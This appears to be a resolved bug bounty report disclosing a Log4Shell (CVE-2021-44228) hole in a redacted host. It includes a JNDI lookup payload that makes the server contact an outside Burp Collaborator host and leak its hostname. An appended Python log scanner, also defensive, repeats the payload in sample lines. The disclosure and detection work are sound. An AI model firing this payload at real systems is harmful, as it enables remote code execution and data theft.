Log4j Vulnerability [HtUS]
Critical
Vulnerability Details
**Description:**
Hi team,
Log4Shell is a recent 0-day exploit; it's a vulnerable Java package. █████ is vulnerable.
**Impact**
RCE
**System Host(s)**
██████
**Affected Product(s) and Version(s)**
**CVE Numbers**
CVE-2021-44228
**Steps to Reproduce**
1. Go to this url => https://█████/?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}
2. Paste the PoC code into the parameter
3. Burp Collaborator then received a reverse ping back
Photos below
**POC CODE**
${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}
**Suggested Mitigation/Remediation Actions**
https://www.lunasec.io/docs/blog/log4j-zero-day/
## Impact
A successful attack leads to arbitrary code execution on the application
Report Stats
- Report ID: 1624137
- State: Closed
- Substate: resolved
- Upvotes: 92
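
A defender-side check for the lookup string in this report, added here as an example and not part of the original report: it percent-decodes access-log lines and flags the direct `${jndi:<scheme>://` form shown in the PoC. The log format, the `collab.example` host, the sample lines and the function names are all constructed assumptions.

```python
import re
from urllib.parse import unquote

# Matches only the direct lookup form from the report: ${jndi:<scheme>://<target>
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<target>[^/\s]*)", re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is inspected too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi_lookups(log_line):
    """Return (scheme, target) pairs for JNDI lookup strings in one log line."""
    text = decode_fully(log_line)
    return [(m.group("scheme").lower(), m.group("target"))
            for m in JNDI_RE.finditer(text)]


# Constructed sample access-log lines (documentation IPs, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:10:00:01 +0000] "GET /?x=%24%7Bjndi%3Aldap'
    '%3A%2F%2F%24%7BhostName%7D.uri.collab.example%2Fa%7D HTTP/1.1" 200 512',
    '203.0.113.8 - - [10/Dec/2021:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] '
    '"GET /?x=${jndi:ldap://collab.example/a} HTTP/1.1" 200 512',
]


def scan(lines):
    """Return (line_number, scheme, target) for every lookup found."""
    hits = []
    for n, line in enumerate(lines, 1):
        for scheme, target in find_jndi_lookups(line):
            hits.append((n, scheme, target))
    return hits


if __name__ == "__main__":
    for n, scheme, target in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme} to {target}")
```

A hit whose target contains a nested lookup such as `${hostName}` means the request tried to carry host data in the outbound name, so the matching DNS and LDAP egress logs are the next place to look.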